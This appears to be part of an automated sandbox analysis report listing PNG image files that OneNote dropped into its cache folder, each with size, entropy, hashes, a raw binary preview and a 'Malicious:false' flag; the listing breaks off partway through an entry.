                                                                                                  SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                  SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                  SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000037.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4190
                                                                                                  Entropy (8bit):7.94161730428269
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                  MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                  SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                  SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                  SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000038.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):11332
                                                                                                  Entropy (8bit):7.9324721568775285
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                  MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                  SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                  SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                  SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000039.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4490
                                                                                                  Entropy (8bit):7.928016176674318
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                  MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                  SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                  SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                  SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003A.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):13241
                                                                                                  Entropy (8bit):7.931391290415517
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                  MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                  SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                  SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                  SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003B.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4181
                                                                                                  Entropy (8bit):7.943341403425058
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                  MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                  SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                  SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                  SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003C.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):14553
                                                                                                  Entropy (8bit):7.951135681293377
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                  MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                  SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                  SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                  SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003D.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4181
                                                                                                  Entropy (8bit):7.950380155401321
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                  MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                  SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                  SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                  SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003E.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2270
                                                                                                  Entropy (8bit):7.845368393313232
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                  MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                  SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                  SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                  SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003F.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):8184
                                                                                                  Entropy (8bit):7.807848176906598
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                  MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                  SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                  SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                  SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003G.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2599
                                                                                                  Entropy (8bit):7.903700862190034
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                  MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                  SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                  SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                  SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003H.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):22634
                                                                                                  Entropy (8bit):7.974332204835705
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                  MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                  SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                  SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                  SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003I.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1570
                                                                                                  Entropy (8bit):7.780157858994452
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                  MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                  SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                  SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                  SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003J.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):11449
                                                                                                  Entropy (8bit):7.91552812501629
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
